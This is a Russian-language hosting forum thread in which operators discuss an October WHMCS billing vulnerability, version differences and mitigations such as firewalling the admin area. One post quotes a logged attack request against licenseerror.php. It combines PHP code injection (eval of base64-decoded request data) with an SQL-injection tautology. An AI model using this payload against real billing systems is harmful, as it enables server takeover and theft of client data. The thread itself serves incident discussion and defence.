WHCMS уязвимость от 18 октября

vitalegkhua
На сайте с 28.03.2012
Offline
85
#31
AGHost:
Кто-нибудь знает, как поправить выделение всех записей в таблице, например в "активных заказах"? Баг репорт отсылал давным-давно, а поправят только в 5.3.

Никак. Нет темплайта этой страницы.

UnixHost Hosting Service (https://unixhost.pro)
ENELIS
На сайте с 29.08.2008
Offline
194
#32

Господа, кого-нибудь ломали через licenseerror.php?

Или это новый хак?

/billing/admin/licenseerror.php?updatekey=true&whitelisted=1&newlicensekey=1%27%3Beval%28base64_decode%28%24_REQUEST%5B%27c%27%5D%29%29%3B%23&match=1&username[sqltype]=TABLEJOIN&username[value]=-1||1=1%23

С Уважением, ServerAstra.ru (https://serverastra.com) - VPS и выделенные сервера в Будапеште по выгодным ценам!
Romka_Kharkov
На сайте с 08.04.2009
Offline
485
#33
ENELIS:
Господа, кого-нибудь ломали через licenseerror.php?
Или это новый хак?
/billing/admin/licenseerror.php?updatekey=true&whitelisted=1&newlicensekey=1%27%3Beval%28base64_decode%28%24_REQUEST%5B%27c%27%5D%29%29%3B%23&match=1&username[sqltype]=TABLEJOIN&username[value]=-1||1=1%23

ENELIS, а кто у вас простите в /admin/ ходит как к себе домой?

Т.С: Если еще читаете, поправьте метку (тег) в этой теме.

Есть около 15.000 ipv4 !!! (http://onyx.net.ua/price.php#ipv4) Качественный хостинг с 2005 года - лучшее клиентам! (http://onyx.net.ua/)
ENELIS
На сайте с 29.08.2008
Offline
194
#34
Romka_Kharkov:
ENELIS, а кто у вас простите в /admin/ ходит как к себе домой?

Т.С: Если еще читаете, поправьте метку (тег) в этой теме.

ну вообще туда надо ввести логин и пароль, почему этот файл позволяет записывать данные в configuration.php напрямую непонятно...

[Удален]
#35

ENELIS, не пугайте людей! Ничего никуда не пишет! Выдает ошибку 500.

p.s. естественно права на запись я дал.

ENELIS
На сайте с 29.08.2008
Offline
194
#36
WapGraf:
ENELIS, не пугайте людей! Ничего никуда не пишет! Выдает ошибку 500.

p.s. естественно права на запись я дал.

Наверное дело в версии, у нас 4.5 последняя.

Пока на 5 не переходим.

В связи со всем этим фарсом, расчехляем свой старый биллинг.

ware
На сайте с 12.09.2010
Offline
406
#37

Я так и думал, что нет смысла переходить с BILLmanager Corporate на дырявую WHMCS. :)

NQhost
На сайте с 12.05.2010
Offline
88
#38
ENELIS:
Наверное дело в версии, у нас 4.5 последняя. Пока на 5 не переходим.

И вас не беспокоит, что любой гражданин не сильно высоких моральных принципов используя уже готовые эксплойты, которые тот же localhost выкладывал, у вас может вытянуть всю базу клиентов и админов? Не говоря уж про остальные гадости.

NQhost.com : Linux VPS (http://ru.nqhost.com), Windows VPS (http://ru.nqhost.com/windows-vps.html) в России, Германии и США Виртуализация - наша специализация
LineHost
На сайте с 20.01.2007
Offline
339
#39
NQhost:
И вас не беспокоит, что любой гражданин не сильно высоких моральных принципов используя уже готовые эксплойты, которые тот же localhost выкладывал, у вас может вытянуть всю базу клиентов и админов? Не говоря уж про остальные гадости.

Меня это тоже крайне удивляет, многие тут спокойно держит открытые двери и надеятся на защёлку - пароль.... потом плачут, ох ах ой ой какая WHMCS дырявая ;)

SERV.LT - Стабильные услуги хостинга, KVM VPS в Литве, Франции. (https://www.serv.lt/ru/vps/kvm/) Недорогие выделенные серверы (https://www.serv.lt/ru/dedicated-lt/) в Литве.
ENELIS
На сайте с 29.08.2008
Offline
194
#40

Да мы просто app firewall повесили поверх, а вообще дело печальное (я про WHMCS).

База не утекла благодаря внутренней системе безопасности. К счастью уходим с WHMCS, того же желаю и остальным.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий